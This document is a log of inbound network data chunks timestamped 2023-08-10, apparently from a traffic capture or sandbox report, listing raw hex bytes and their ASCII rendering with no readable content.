2023-08-10 17:13:01 UTC	80	IN	Data Raw: fc 55 64 ca aa 48 64 56 e7 b5 99 b4 fd 3d a5 15 ce cb b3 73 f2 bb 75 ae cc 81 e5 ac 34 d5 39 18 dd 12 97 de 88 bf cb 4d 0d cf a3 93 43 bb cc 27 0a 49 55 cf 5c c6 33 93 9b c6 0d 60 12 3d 97 d2 d9 97 c9 0d c5 f9 c3 a9 12 71 4b 29 f2 89 cc bb 00 49 7f 72 3f 05 b4 94 70 4d c6 26 10 64 53 c1 52 76 82 91 c2 d7 aa 3a 1c 11 65 a7 6b c5 35 d8 1c fa c4 1e 28 58 bb 08 dd d2 8a 2f 5e 31 5e 83 57 94 a3 a3 de 0c 0d 99 74 09 bb 09 17 14 02 ea b8 ab 18 94 b3 a2 1e 05 d7 8f 96 26 70 15 5c 20 e8 c1 d6 53 4d 72 e4 98 6c 2c 4d d6 8c 0c 0e 2a d2 f7 3a 87 71 83 47 c5 f5 01 ed 4d e6 39 87 11 e6 b4 80 6c b3 22 bd bf 18 cb a4 f0 25 35 ce fc 62 a4 11 28 07 e8 9c 29 b2 c5 28 ed 60 7b 7b 2f a2 5f 49 48 03 6c 56 30 16 53 8d 40 0c 5f 63 2e 69 5c 9d e3 92 13 f1 2e 83 de 7d 55 bc 2c f9 Data Ascii: UdHdV=su49MC'IU\3`=qK)Ir?pM&dSRv:ek5(X/^1^Wt&p\ SMrl,M*:qGM9l"%5b()(`{{/_IHlV0S@_c.i\.}U,
2023-08-10 17:13:01 UTC	81	IN	Data Raw: 3a ba fe cb 85 23 d2 db cb d4 8a 5e fe 0f 36 22 2b 7f d1 3f ca 39 2d e2 10 05 fd 2c d8 c0 2e 1b 37 6b 0b ed f7 72 a7 48 0f b9 50 f0 f7 e0 f4 57 c0 72 fe 0f df 47 c6 79 df 6c bf 6c eb a5 af a0 5c 49 5f f7 c0 c8 df 5f ce ec 47 db 08 02 a6 a9 e6 79 86 c9 9d cc 83 03 27 e9 d9 d5 74 5d 5d ff 6b 3c 53 5b cc 3a 7e 90 aa bf 8c 8f Data Ascii: :#^6"+?9-,.7krHPWrGyll\I__Gy't]]k<S[:~
2023-08-10 17:13:01 UTC	82	IN	Data Raw: 8f f3 fd 2b 16 ba 8d 72 5d 3c ed 76 b7 1e 27 2f d4 0a a1 a8 26 b9 32 f8 a1 90 b4 c9 4b 76 37 86 c8 e7 67 f8 34 e3 fc 0b fb 7b 57 1d bd 90 89 5b 5f a6 db 22 52 49 9a b4 6e 28 90 15 80 89 ab 0e 7b fd 68 c8 e0 cc 63 65 a0 4b 6f fc f1 bf 33 73 31 26 db 68 a9 a5 4b 47 ff c2 6b 27 c1 fc ae d9 1c 77 27 64 19 33 82 ee 67 fb d6 34 1b 2d bb 75 66 f9 b7 5b 4b d6 66 77 fd 9d 03 73 fa ae 48 d9 d4 56 ea 64 75 cf 7f b8 35 5c ad 93 bc 75 9f 5d 20 a4 7c d5 ad c2 56 3a ad 2b 3e 63 c4 35 bc 95 a8 1c b3 70 d2 4d 81 b7 22 0f f5 5b 42 73 54 63 6a 45 ba 90 d3 c5 60 15 5c c7 4b a8 60 01 bf 6b b6 bb d5 6b 6c fd ba 28 93 97 5b e6 26 53 3d 8c c6 9b ae a2 10 5c 6c c8 8e 8d 69 b2 78 4e 54 0c fa 1d 86 ae 36 91 e1 aa e4 e9 66 5c b2 88 c2 7f 78 c6 59 4d 8e bf ff 55 47 4c 22 9a a3 db 7e Data Ascii: +r]<v'/&2Kv7g4{W[_"RIn({hceKo3s1&hKGk'w'd3g4-uf[KfwsHVdu5\u] \|V:+>c5pM"[BsTcjE`\K`kkl([&S=\lixNT6f\xYMUGL"~
2023-08-10 17:13:01 UTC	83	IN	Data Raw: c0 f5 95 fd a5 e4 0c 44 f3 e2 8f b5 d2 22 05 57 18 24 55 8f 72 f9 7e 65 ff 87 3d 66 ca f1 e9 8c 61 93 ec 6f 7a b9 98 7e b5 e2 66 c4 34 7f 34 23 ec cf 1e 4f 53 ef f8 5e 21 65 6a c5 45 da e8 ee 01 1c 0b 24 fa 3a ef fc 3f 71 d2 81 9a 8b 30 40 d2 61 23 f5 a5 08 53 70 e8 a1 64 8e 5c 32 d6 16 b4 70 ad 2d 6e 98 12 1e e9 3e f9 0f 0b 4f cb 0e da dd 6d 38 ec f9 c4 dc 2a 63 78 e5 4d 2c 4e b1 41 4b f4 02 67 7b 5d 97 28 e1 9d d3 b6 80 94 f6 e6 c0 82 e6 1c 0b 5f f2 40 1f 08 d8 80 2f bc 64 8a b1 55 8a 00 4b dc fd 5b ba 86 4c 34 4b c0 26 ba 49 6f b6 cd 9d 7d 1e ab 54 96 b6 22 d3 54 7f 0b ca 1b a7 06 41 f9 fd 0f 1d 84 81 e0 11 60 9f 17 e8 ca 25 3c a1 f1 e7 fc 0f d8 4c cf 4a 19 d1 84 48 0d 7a 4f a7 52 76 92 26 f5 4a 4b 30 63 f6 fc ab 7f 40 f4 94 3c 90 4d 07 e1 ef a2 c9 d6 Data Ascii: D"W$Ur~e=faoz~f44#OS^!ejE$:?q0@a#Spd\2p-n>Om8*cxM,NAKg{](_@/dUK[L4K&Io}T"TA`%<LJHzORv&JK0c@<M
2023-08-10 17:13:01 UTC	84	IN	Data Raw: 0e 36 51 3c 8f 34 37 70 7d 0b f4 1d e9 48 d3 8c 72 2e 1b 95 a3 7f 05 a3 79 08 cf 40 5d 50 40 07 06 6c c0 60 13 b8 c2 d0 58 b5 3a 2b ed 27 45 bf 5e 56 9b 67 a8 41 39 e0 58 ff a6 0b c6 9a a3 fe dc 3b 0f 39 9a 43 0e 3c 97 46 b4 a9 23 0d c5 d4 9b c9 fa f1 d1 66 f3 45 c5 4a 9e f1 39 df ba e7 cf ab fb 2f 90 34 f8 d5 c2 86 53 76 08 23 de 30 4d 03 66 2e 5f 4c 7f f3 a8 98 4f d5 20 ca 29 58 c7 6f 3b 7a 9d f5 24 0a 23 01 50 27 3a e3 57 8e 7c 07 fe e2 14 4b f9 13 16 d2 c2 98 93 9f a4 f5 0d bb 28 cb d7 e2 65 e1 c9 25 4c 69 e7 80 37 59 99 a3 83 15 3b 8a 73 34 02 b7 d8 62 c5 c6 19 03 33 16 20 8e fb aa 0d d6 7c af 93 87 ed c5 aa 23 bd a2 28 9f 4f 3c ca d1 63 eb 9e d1 1b 97 84 eb 09 29 5e 27 28 b8 1d 7e 83 6d e7 c7 96 48 cc e1 52 8b 04 6b f7 3b b7 58 63 01 99 4f 75 cb 05 Data Ascii: 6Q<47p}Hr.y@]P@l`X:+'E^VgA9X;9C<F#fEJ9/4Sv#0Mf._LO )Xo;z$#P':W\|K(e%Li7Y;s4b3 \|#(O<c)^'(~mHRk;XcOu
2023-08-10 17:13:01 UTC	85	IN	Data Raw: 3c e8 95 d2 8e 3a 96 6b 44 54 6c 98 16 38 7d ae 2d 22 86 75 db d7 2e 2b 65 0c 78 ee a3 bd 34 c6 a0 af fc 15 02 be 30 58 28 5f 37 ab cb df a6 dd b7 04 0f f0 03 e9 9f 5f 89 0d 0f 6c 75 b1 37 47 3e d7 20 6b 8c c8 ad a0 fc 0b 8c e3 4a b1 90 de df 3a 79 b5 47 81 7d 05 f5 41 36 e2 1f 50 5d bd 56 4c e7 16 31 a7 85 a2 a2 33 5b ff 9d 96 17 77 4a a6 9d d4 5d 7b cc b0 b9 37 d9 8f 5d 8f 14 6c f9 2d 82 de 7c a4 31 57 63 ac 26 ec b9 14 f0 13 d1 35 4b fb 72 7a 9e df 37 60 50 78 03 9a ab 93 16 e3 42 41 ba d9 d4 33 82 0b 6b 3c 66 ca 4a 65 2c ee c1 d5 54 10 cc 15 98 ec 1f 64 3a 55 25 e5 1b 93 99 c0 14 04 31 bd 7e 45 56 0a 12 73 c4 d8 97 3c 1d e4 ae 50 25 e4 d8 bb 73 75 6a ca 66 97 d6 08 44 6d 7b 2b ed 39 ea ea 5b 8a 33 d9 11 dd c3 23 aa e3 05 92 b3 ef ba a9 e1 4b 81 1b ca Data Ascii: <:kDTl8}-"u.+ex40X(_7_lu7G> kJ:yG}A6P]VL13[wJ]{7]l-\|1Wc&5Krz7`PxBA3k<fJe,Td:U%1~EVs<P%sujfDm{+9[3#K
2023-08-10 17:13:01 UTC	86	IN	Data Raw: 1c 09 fb 9a b9 52 64 a8 77 ec 42 52 a0 89 cb b5 39 cd bd 1f d1 d6 68 36 35 0c d2 28 1b 8a da df 4f e2 ef a2 c8 a8 5e cc 07 b5 9f 4b 1a 24 5d 07 f0 35 6a af 6b 86 60 9f 90 f3 75 3a 46 fe 61 20 8e 2e 80 27 af e5 16 5b 9f e0 fa 52 06 6a ab 1c 64 55 d4 68 1f 4d 2a 4d 2e 32 61 2c cf ea a1 9e 97 8e eb bd f2 a5 da 93 36 11 59 77 2a 36 88 d4 05 df bd 09 63 14 3f 80 5a 58 28 77 89 75 0c 69 70 96 41 d4 e8 b0 9d 3a aa 02 8d 8c 8d af 57 33 b8 63 35 7c 16 fc e0 6a 3a c7 ff af 67 e2 4a 3a 3b 6f 15 e1 b1 2a 13 5e e1 f3 29 66 82 e1 a4 55 95 63 ba 55 4b e0 ad bf 8e 31 05 bd 10 2c bb 3a 51 29 1f 88 cf cc 2d 88 6b 0d 73 cf d6 08 17 1b 9b 7c 32 4d 88 b2 31 2c 52 82 91 bd 8e 9a 4a 8f bc ee 5b 4c 7b 01 1d b8 e9 cd e2 b2 37 74 6f 9c 96 45 2e da 89 86 cd 8f 0f 4d c6 ff 18 68 7e Data Ascii: RdwBR9h65(O^K$]5jk`u:Fa .'[RjdUhMM.2a,6Yw6c?ZX(wuipA:W3c5\|j:gJ:;o*^)fUcUK1,:Q)-ks\|2M1,RJ[L{7toE.Mh~
2023-08-10 17:13:01 UTC	88	IN	Data Raw: 27 dd 97 4d a4 78 63 7c 83 b2 3a c4 ec 69 32 24 40 c0 6e 1e 77 a6 7b b3 d6 ac 14 af 4e 0b 6b 93 0c 81 29 db 81 fa 7c d1 14 eb 6f 9e d9 5b d5 3a 55 67 ab b9 7e 3b 8d 40 0c 5c 62 58 dc 7f 9b 0e 82 38 9f 47 22 04 a8 d6 68 e6 29 10 e7 72 6e 6f 2c 68 b4 63 58 26 b8 a6 0e 01 55 c9 ff 5c 65 f1 b2 2e 89 7e 55 66 ef f3 e5 4f 9c 99 cf a7 fe 63 17 6f 49 86 e4 b5 73 04 25 10 0c e7 3d 06 5a 8f ad 37 64 65 40 af ee c7 79 07 39 f4 fd fa 20 e8 5e 57 3e 10 45 8f 10 0d 1c 6e 7e 21 a5 e6 dd 3d dd d5 12 1b 18 23 46 3d b8 fb c6 30 96 7e 41 ab 82 8c b7 eb 5c 01 b6 1e 65 4a f2 db 86 11 97 7a 5c 5c 37 9b 3a 39 5f 9a 12 98 ce f3 0c 05 33 ac db 67 7f b5 ba b1 4a 4e 8f 48 c0 3b 10 d3 d6 0b ac ec 7d bd 36 e4 aa d3 99 c7 9b 2b 94 f8 c2 bd 1c 4e 41 82 d6 d4 44 c2 2b f5 8a 86 db 9a a0 Data Ascii: 'Mxc\|:i2$@nw{Nk)\|o[:Ug~;@\bX8G"h)rno,hcX&U\e.~UfOcoIs%=Z7de@y9 ^W>En~!=#F=0~A\eJz\\7:9_3gJNH;}6+NAD+
2023-08-10 17:13:01 UTC	89	IN	Data Raw: b6 e7 f3 9e 44 51 b3 47 93 22 0c 53 ad 14 48 f2 93 69 11 5a a0 78 64 5a 09 47 9e b6 a0 15 25 ab e1 86 ad 53 ea f7 1d 6a 26 3c 36 8b 1b d5 32 de de 37 fa bb ac df 7f 13 c6 69 77 90 c3 e7 92 c5 01 b9 30 e9 0a a4 58 c6 da 15 be c9 a0 4e 86 11 ff 63 c3 9b 1d bc b5 4f d3 7a 2e 90 3b ad 96 56 08 8e b4 f4 7a 25 6d 98 f3 28 31 5e 63 6e 28 e7 67 8f 10 ee 36 24 3c f4 95 da 8e 37 96 7c 44 57 6c 9d 16 3f 7d b9 2d 3f 86 6f db d2 2e 00 65 37 78 ee a3 a5 34 a3 a0 dd fc 32 02 93 30 63 28 47 37 9e cb eb a6 f5 b7 2a 0f d0 03 cf 9f 71 89 32 0f 0f 75 96 37 66 3e ee 20 3a 8c 9a ad f3 fc 7a 8c c5 4a bb 90 b1 df 12 79 89 47 b8 7d 7d f5 32 36 0c 86 bc c4 40 cf 9c d8 79 31 d4 85 fe a2 54 1b b6 ac c6 24 26 7f e2 aa 8a 64 55 8e 8b fd 2e 9f df 5d fd 14 53 b2 4e 84 b7 7c c8 31 32 63 Data Ascii: DQG"SHiZxdZG%Sj&<627iw0XNcOz.;Vz%m(1^cn(g6$<7\|DWl?}-?o.e7x420c(G7*q2u7f> :zJyG}}26@y1T$&dU.]SN\|12c
2023-08-10 17:13:01 UTC	90	IN	Data Raw: 8d ce 4a 91 e5 e2 4f e7 f9 66 01 0f 60 ef fe 06 5f 3a 09 ec 0e b8 a6 ec 57 fd 41 d4 f8 5d 29 47 9e d6 75 a4 10 ad f9 db 12 c4 05 7f 1c ca fe 0e f2 d8 0a e9 55 19 a2 a4 6f 8f 23 54 55 07 b1 81 5d 75 f8 3c 5e 6b b8 09 e7 19 89 5f a0 14 12 ba 87 76 49 38 90 36 3f 57 fe d7 f2 36 4e 84 e0 f8 ec c3 10 29 ba 99 ce 9a b5 4c a0 b2 53 07 3c f5 1f 37 a3 9e 0c da 1c 0e fb 92 b9 54 64 a9 77 e5 42 63 a0 b9 cb 8d 39 d1 bd 65 d1 bf 68 1d 35 0f d2 26 1b cd da e7 4f ef ef 8b c8 85 5e c0 07 a2 9f 56 1a 2b 5d 0b f0 47 6a 85 6b ef 60 fc 90 c8 75 07 46 d7 61 19 8e 1c 80 66 af b7 16 4c 9f d3 fa 7c 06 6e ab 2b 64 59 d4 68 1f 55 2a 2c 2e 6e 61 39 cf f5 a1 8c 97 8f eb b7 f2 e8 da b1 36 10 59 69 2a 59 88 b9 05 e5 bd 33 63 3f 3f d4 5a 0f 28 62 89 4e 0c 58 70 ab 41 ea e8 ff 9d 0b aa Data Ascii: JOf`_:WA])GuUo#TU]u<^k_vI86?W6N)LS<7TdwBc9eh5&O^V+]Gjk`uFafL\|n+dYhU,.na96YiY3c??Z(bNXpA
2023-08-10 17:13:01 UTC	91	IN	Data Raw: d4 0f 76 91 0a ee 9c ef 88 48 ed 81 35 b3 06 a1 86 7c ab 7a 11 05 75 4f e0 9f 9d 08 65 c2 47 b5 72 c4 f0 55 32 c3 40 c8 9d 0d d6 b7 21 c5 65 87 c9 34 31 aa 4c ec a9 e1 80 1a f8 49 58 1a 63 4a 86 2e 61 c2 eb 32 68 0d 93 25 44 4d 29 c4 12 b4 05 20 97 f5 b0 84 75 2b 0e 2f 70 66 06 72 f9 d3 86 71 8b a2 9d 99 63 01 ab c7 47 af 3a f8 88 a7 11 1f 43 e1 8f 7e 27 c9 97 44 a4 70 63 29 83 b3 4e fa bf 6e 40 65 40 87 0b 2a 27 d4 14 d0 97 c8 70 8e 6e 34 5d d0 58 ed 23 d4 86 c4 6c c3 12 ef 79 b2 fd 3e a7 54 34 2f ce e6 5e 02 e3 6c 7e 55 12 49 b9 69 cb 0e f1 4b e8 28 50 17 84 97 0e e7 5b 19 b4 29 0c 66 45 7d e1 45 14 0a 98 ce 61 2a 00 95 ba 07 2a e8 dc 2f 8d 5a 14 78 e2 a2 9b 55 cf d0 d7 8f b8 5b 48 1e 3e ee 90 e4 00 78 71 49 7a ae 58 52 03 96 81 73 64 62 2f ae 9a c4 18 Data Ascii: vH5\|zuOeGrU2@!e41LIXcJ.a2h%DM) u+/pfrqcG:C~'Dpc)Nn@e@'pn4]X#ly>T4/^l~UIiK(P[)fE}Ea*/ZxU[H>xqIzXRsdb/
2023-08-10 17:13:01 UTC	93	IN	Data Raw: e3 35 75 23 44 f7 dc 62 e4 35 82 72 72 1f 29 94 f8 01 6f 20 4b 19 36 ee 49 f1 4d 3f 1a ee 6d 7f d6 3b 30 42 63 8f f7 4c c9 da 13 d2 fd 5d e6 b5 ec 86 a0 2c 15 2c 06 7c c3 a3 15 ef 84 f6 4e f5 b7 01 22 a9 15 54 c6 4f 33 9c 2d 91 97 7a ea c5 fa 1e 43 76 30 c4 de bf 0d f5 9d 3d d0 07 f7 99 e2 52 0f f5 7a 4c ab e4 e4 25 4f 83 70 ff 35 70 dd 06 1a 1e 63 e6 b6 f2 f3 b6 44 03 b3 55 93 50 0c 13 ad 3b 48 e7 93 57 11 56 a0 79 64 4b 09 41 9e b0 a0 20 25 96 e1 9f ad 4d ea c4 1d 45 26 31 36 82 1b de 32 d9 de 70 fa a6 ac d8 7f 1f c6 1a 77 b5 c3 c1 92 ea 01 8c 30 f4 0a 99 58 d3 da 1a be c3 a0 36 86 4d ff 63 c3 88 1d a0 b5 5a d3 64 2e 98 3b c8 96 25 08 82 b4 9e 7a 06 6d ab f3 7b 31 3b 63 1c 28 b4 67 99 10 c0 36 1c 3c 84 95 ef 8e 1b 96 54 44 17 6c b9 16 25 7d af 2d 22 86 Data Ascii: 5u#Db5rr)o K6IM?m;0BcL],,\|N"TO3-zCv0=RzL%Op5pcDUP;HWVydKA %ME&162pw0X6McZd.;%zm{1;c(g6<TDl%}-"
2023-08-10 17:13:01 UTC	94	IN	Data Raw: ea 9f a7 9a 97 4d e0 74 12 a1 14 5c d2 66 1e d4 82 dc 6b e0 26 0d 41 04 f7 78 6b a9 b3 a7 9a 3d 07 35 be 8f 22 2f 7c a6 2c 31 30 fd 8e 87 a4 ed ae dd 99 e9 d9 34 44 f3 86 49 df f9 0a 35 05 b5 1a 8d 7c c1 ab 1a 3e 03 bb 74 91 3f 43 df 4d f8 29 55 9c 52 88 91 7e aa e9 97 a8 d8 c1 5d 26 3f f4 a7 b5 fa 73 00 6d 5f 67 c4 9a db af 61 62 e9 11 75 95 85 40 9b 8d 98 4a a1 e5 be 4f d0 f9 25 01 4f 60 83 fe 4c 5f 26 09 db 0e c1 a6 cf 57 d3 41 f6 f8 5a 29 47 9e d4 75 c1 10 de f9 ce 12 e5 05 79 1c ca fe 03 f2 db 0a ea 55 52 a2 e0 6f b5 23 49 55 04 b1 96 5d 76 f8 32 5e 6b b8 15 e7 45 89 42 a0 1c 12 ad 87 6c 49 03 90 2a 3f 7d fe c9 f2 27 4e d8 e0 b7 ec a5 10 1c ba bf ce bf b5 7d a0 b9 53 77 3c 91 1f 5c a3 f2 0c cb 1c 2e fb 9d b9 49 64 a9 77 e6 42 6d a0 8e cb 9c 39 ee bd Data Ascii: Mt\fk&Axk=5"/\|,104DI5\|>t?CM)UR~]&?sm_gabu@JO%O`L_&WAZ)GuyURo#IU]v2^kEBlI*?}'N}Sw<\.IdwBm9
2023-08-10 17:13:01 UTC	95	IN	Data Raw: a3 fc a2 fd e7 1d e4 c9 7b dd f1 de 1d 0b 81 2b 6e 1e 29 73 c9 8c 9c a1 86 e6 80 3a 2e c5 04 fc 57 24 49 e4 b3 3d c3 f1 1b 52 1e 57 e5 25 d7 72 91 f0 ab 43 07 5b 56 2d db 79 77 cb 49 b7 64 e4 d1 ec 3b d2 6f d5 6a c4 38 c0 85 41 54 3c f5 72 c6 7b c3 f6 10 d9 11 18 c5 c5 83 83 2b 4a b5 b4 8a 6c 8a 49 dc 09 af 26 00 0e 37 00 d2 aa 53 c9 4d 19 9e 22 b0 08 d4 0a 76 ff 0a 9d 9c f0 e4 61 9e b0 7d 82 68 99 ea 51 ab 56 63 13 14 4f 85 aa f4 64 00 b0 47 91 00 f1 84 76 74 cb 2c df 9d 2d d6 bf 59 cd 11 b9 bb 3a 52 a8 3f fa a9 d0 80 34 f8 60 58 18 63 51 86 7b 61 99 eb 70 68 0c 93 15 44 71 29 a8 12 82 77 3e e7 e8 e3 9e 07 31 60 0c 24 68 44 6f 97 d3 f4 54 ca 96 9d ab 63 17 ab 9b 47 82 3a ca 88 84 11 5e 43 a5 8f 11 27 9f 97 1b a4 2c 63 04 83 d4 3a bc ec 5c 32 10 40 ed 6e Data Ascii: {+n)s:.W$I=RW%rC[V-ywId;oj8AT<r{+JlI&7SM"va}hQVcOdGvt,-Y:R?4`XcQ{aphDq)w>1`$hDoTcG:^C',c:\2@n
2023-08-10 17:13:01 UTC	96	IN	Data Raw: 63 81 c6 2d c8 f5 8c 28 95 27 9f 2f 0d 95 bd 5b ee a0 b1 a7 ee 57 f2 72 fc c1 b3 5c cd 20 7c fd 1c 07 40 f9 42 5c b7 ac 0c 30 3b 37 ee f1 7a 5f ee aa 4c 8f bc e0 8c 88 27 12 d8 f7 e8 a5 fc 16 8b 6a c8 6d 41 55 f4 86 6e 3d 30 e7 46 8b 7d 31 81 e0 cb fa 8f 4e 26 4b 2a 81 17 c3 31 6d b7 cf 27 64 9e 4c e9 3e 45 e4 1c 9c 41 89 51 68 18 81 ad 93 0c dd 3e 27 e3 39 75 06 44 e1 dc 7d e4 37 82 65 72 08 29 b6 f8 55 6f 23 4b 28 36 e9 49 e8 4d 18 1a ee 6d 7e d6 63 30 5f 63 90 f7 20 c9 da 13 81 fd 30 e6 c1 ec d3 a0 0f 15 1f 06 49 c3 b8 15 a9 84 a2 4e f6 b7 30 22 ae 15 41 c6 7a 33 8b 2d 9b 97 7b ea d7 fa 03 43 5e 30 87 de 83 0d f6 9d 27 d0 12 f7 aa e2 47 0f ef 7a 50 ab fd e4 39 4f df 70 ef 35 08 dd 72 1a 4d 63 c3 b6 f5 f3 91 44 32 b3 40 93 52 0c 76 ad 67 48 ef 93 5b 11 Data Ascii: c-('/[Wr\ \|@B\0;7z_L'jmAUn=0F}1N&K*1m'dL>EAQh>'9uD}7er)Uo#K(6IMm~c0_c 0IN0"Az3-{C^0'GzP9Op5rMcD2@RvgH[
2023-08-10 17:13:01 UTC	97	IN	Data Raw: 37 f1 d1 76 03 cd c5 e4 68 07 2f 49 c1 39 3a b5 47 f8 3b 12 e8 44 b3 fc b7 99 b2 c3 70 50 94 61 b0 9e a0 f9 71 9d 1c c9 24 72 e7 7d d1 11 36 e7 15 d2 eb 1d d4 a8 41 8d cd f2 ca c1 ef 40 e1 bb 52 d0 ac a3 18 ec b3 c6 81 08 bb f5 93 33 e1 28 f4 84 f4 b9 ab 95 3e 45 87 a8 4c e8 ca a7 ee e6 2d 67 7b 0e 66 7d 6d 90 f0 b9 e2 db Data Ascii: 7vh/I9:G;DpPaq$r}6A@R3(>EL-g{f}m
2023-08-10 17:13:01 UTC	98	IN	Data Raw: d2 90 8e 41 d5 f0 81 6c 14 d1 ea 9b a7 d5 97 73 e0 5d 12 88 14 46 d2 4b 1e f3 82 f1 6b d9 26 33 41 3d f7 5b 6b a8 b3 a1 9a 34 07 32 be 90 22 4a 7c d5 2c 6d 30 b2 8e a1 a4 f6 ae d7 99 f2 d9 2c 44 f9 86 3b df 9c 0a 69 05 b5 1a 8b 7c ca ab 01 3e 1a bb 41 91 2c 43 ce 4d cc 29 79 9c 56 88 ae 7e 88 e9 8d a8 ff c1 66 26 00 f4 8f b5 f5 73 2a 6d 4a 67 d1 9a db af 6d 62 e2 11 5a 95 b4 40 f1 8d d2 4a f4 e5 81 4f 9f f9 50 01 1e 60 9c fe 7c 5f 2d 09 d5 0e fe a6 9f 57 a1 41 f5 f8 4f 29 4f 9e cb 75 d6 10 db f9 bc 12 ce 05 60 1c d2 fe 6f f2 b4 0a c9 26 58 eb a3 1d 9f 53 52 00 0c c1 90 32 75 9d 30 2a 5d d9 04 86 19 89 63 a0 06 12 af 87 6d 49 1f 90 77 3f 77 fe d7 f2 36 4e 84 e0 94 ec a0 10 11 ba d6 ce f9 b5 6b a0 b9 53 0b 3c ce 1f 11 a3 b0 0c f8 1c 12 fb 87 b9 5b 64 b1 77 Data Ascii: Als]FKk&3A=[k42"J\|,m0,D;i\|>A,CM)yV~f&smJgmbZ@JOP`\|_-WAO)Ou`o&XSR2u0]cmIw?w6NkS<[dw
2023-08-10 17:13:01 UTC	99	IN	Data Raw: ea 8e 66 bc 71 e1 9b 00 43 78 a3 e3 a2 ae e7 2a e4 eb 7b d5 f1 d6 1d 00 81 5f 6e 42 29 66 c9 82 9c b1 86 fd 80 3f 2e cd 04 fa 57 24 49 cb b3 55 c3 f4 1b 41 1e 7f e5 75 d7 1e 91 c3 ab 77 07 62 56 31 db 65 77 e3 49 9e 64 d3 d1 d3 3b e2 6f 9d 6a ab 38 e0 85 5a 54 29 f5 06 c6 0c c3 c4 10 c4 11 1b c5 ed 83 b9 2b 4a b5 b4 8a 7d 8a 7c dc 21 af 67 00 2c 37 40 d2 9f 53 f2 4d 07 9e 2e b0 03 d4 63 76 b4 0a 9d 9c f0 e4 70 9e b7 7d 8d 68 83 ea 4d ab 69 63 3c 14 6c 85 8a f4 3b 00 d3 47 b6 00 fd 84 1e 74 e3 2c e3 9d 44 d6 f2 59 ac 11 f2 bb 28 52 93 3f c8 a9 f1 80 37 f8 76 58 3e 63 6e 86 33 61 b9 eb 52 68 20 93 49 44 04 29 b7 12 ab 77 10 e7 f1 e3 83 07 35 60 21 24 7d 44 78 97 da f4 08 ca d5 9d ea 63 0d ab c9 47 b7 3a ff 88 e8 11 06 43 e6 8f 39 27 ad 97 28 a4 39 63 5a 83 Data Ascii: fqCx*{_nB)f?.W$IUAuwbV1ewId;oj8ZT)+J}\|!g,7@SM.cvp}hMic<l;Gt,DY(R?7vX>cn3aRh ID)w5`!$}DxcG:C9'(9cZ
2023-08-10 17:13:01 UTC	100	IN	Data Raw: fe a7 81 10 0f c1 af bf b9 8c a5 f5 2f 75 79 1a f0 22 ba 5a d3 2b 55 62 a0 5c 2f e9 9c b1 58 b4 b3 c6 8a a2 c2 eb cc f0 5c 01 84 4b 50 5f ad bc 32 1d 7d 2f 8e 81 e8 54 9e c5 71 ea 98 6b 54 6c 45 ec 5f 49 21 99 e7 4d 54 76 1d 15 50 3f a0 88 f9 99 11 7c 0d e6 4e 6f 11 2c 10 8f 97 fa 69 e6 77 50 41 91 76 c0 2d d3 87 c3 a2 46 9e 4b 1b a0 d0 cc 70 9f e4 e5 4a c5 ec 89 2f c4 c8 f7 cb 92 3a d5 10 12 ad 33 ce fb 5c fc 09 61 fa d4 d5 2f e5 dc 0d 3a 66 ae 23 69 35 52 c1 09 56 5f 96 55 b7 ff 7d e9 32 48 cd 38 c9 66 b0 63 cd 8b 32 80 49 29 ea ab 80 9b 3b 63 07 06 b1 14 70 20 9d cc 5e 05 61 21 cc 4a f2 48 bb 98 80 22 2f 75 30 c3 d7 74 07 e7 2d c7 ed b3 41 92 37 80 ac 7a 2a f5 93 36 5f 2c 3b 3d 8c 83 f4 41 f1 77 50 97 fc 55 68 6e 4d fe e6 e6 96 9d 27 a4 fd eb 57 55 5d Data Ascii: /uy"Z+Ub\/X\KP_2}/TqkTlE_I!MTvP?\|No,iwPAv-FKpJ/:3\a/:f#i5RV_U}2H8fc2I);cp ^a!JH"/u0t-A7z*6_,;=AwPUhnM'WU]
2023-08-10 17:13:01 UTC	101	IN	Data Raw: 73 05 8c 4d dd 42 21 ec 8b a4 37 a0 d1 30 03 9d c5 e4 68 07 2f 19 c1 4c 3a d7 47 94 3b 7b e8 27 b3 b7 b7 fc b2 ba 70 16 94 08 b0 f2 a0 9c 71 9d 1c 9d 24 17 e7 0f d1 7c 36 8e 15 bc eb 7c d4 c4 41 d9 cd 8b ca b1 ef 25 e1 bb 52 d0 ac f3 18 83 b3 b4 81 7c bb bb 93 46 e1 45 f4 e6 f4 dc ab e7 3e 45 87 a8 4c bb ca c8 ee 80 2d 13 7b 79 66 1c 6d e2 f0 dc e2 87 d2 a9 8e 23 d5 99 81 1f 14 ff ea f8 a7 ba 97 1e e0 01 12 c3 14 2f d2 1f 1e a7 82 a8 6b 85 26 60 41 58 f7 28 6b db b3 c8 9a 5b 07 5c be e3 22 4a 7c d5 2c 6d 30 b2 8e f2 a4 99 ae b1 99 86 d9 5b 44 98 86 49 df f9 0a 35 05 e6 1a e2 7c a7 ab 6e 3e 74 bb 15 91 4d 43 ba 4d a4 29 18 9c 3b 88 f2 7e d8 e9 f8 a8 ab c1 32 26 59 f4 d3 b5 a6 73 4f 6d 39 67 a2 9a b2 af 02 62 8c 11 29 95 b4 40 ae 8d b6 4a 91 e5 e2 4f 9f f9 Data Ascii: sMB!70h/L:G;{'pq$\|6\|A%R\|FE>EL-{yfm#/k&`AX(k[\"J\|,m0[DI5\|n>tMCM);~2&YsOm9gb)@JO
2023-08-10 17:13:01 UTC	102	IN	Data Raw: 5a 12 01 c4 b7 97 5b 1d 96 ae 31 25 89 d8 9b 73 33 6a a3 66 fb d6 6d 44 1e 7b 2b ed 1c ea 99 5b d6 33 fc 11 ae c3 23 aa c6 05 e1 b3 b3 ba 8c e1 38 81 47 ca 29 a5 6c 6c 28 5c 08 ab 48 2a 5e d8 ca d3 cc d9 49 68 8b 7f 17 43 6a f1 99 73 04 85 1b 69 40 20 f0 0a 02 c7 b3 20 2f cb a9 47 d9 d3 46 1d 05 5c c8 0e ed 70 51 40 5e 5e 46 9c 6b 84 12 a6 d7 6c 68 2e ea d9 66 d5 71 8f 9b 46 43 0c a3 93 a2 8e e7 69 e4 87 7b bc f1 b3 1d 6e 81 2b 6e 1e 29 20 c9 e3 9c c7 86 92 80 4d 2e a4 04 8e 57 41 49 b8 b3 7b c3 90 1b 20 1e 0b e5 75 d7 1e 91 85 ab 24 07 32 56 43 db 0a 77 97 49 f1 64 b0 d1 bc 3b 8e 6f 9d 6a ab 38 b3 85 35 54 4f f5 72 c6 7b c3 a5 10 b6 11 7e c5 b1 83 f4 2b 2b b5 c6 8a 09 8a 15 dc 4f af 47 00 7c 37 32 d2 f6 53 99 4d 75 9e 57 b0 6f d4 63 76 91 0a ee 9c ac e4 Data Ascii: 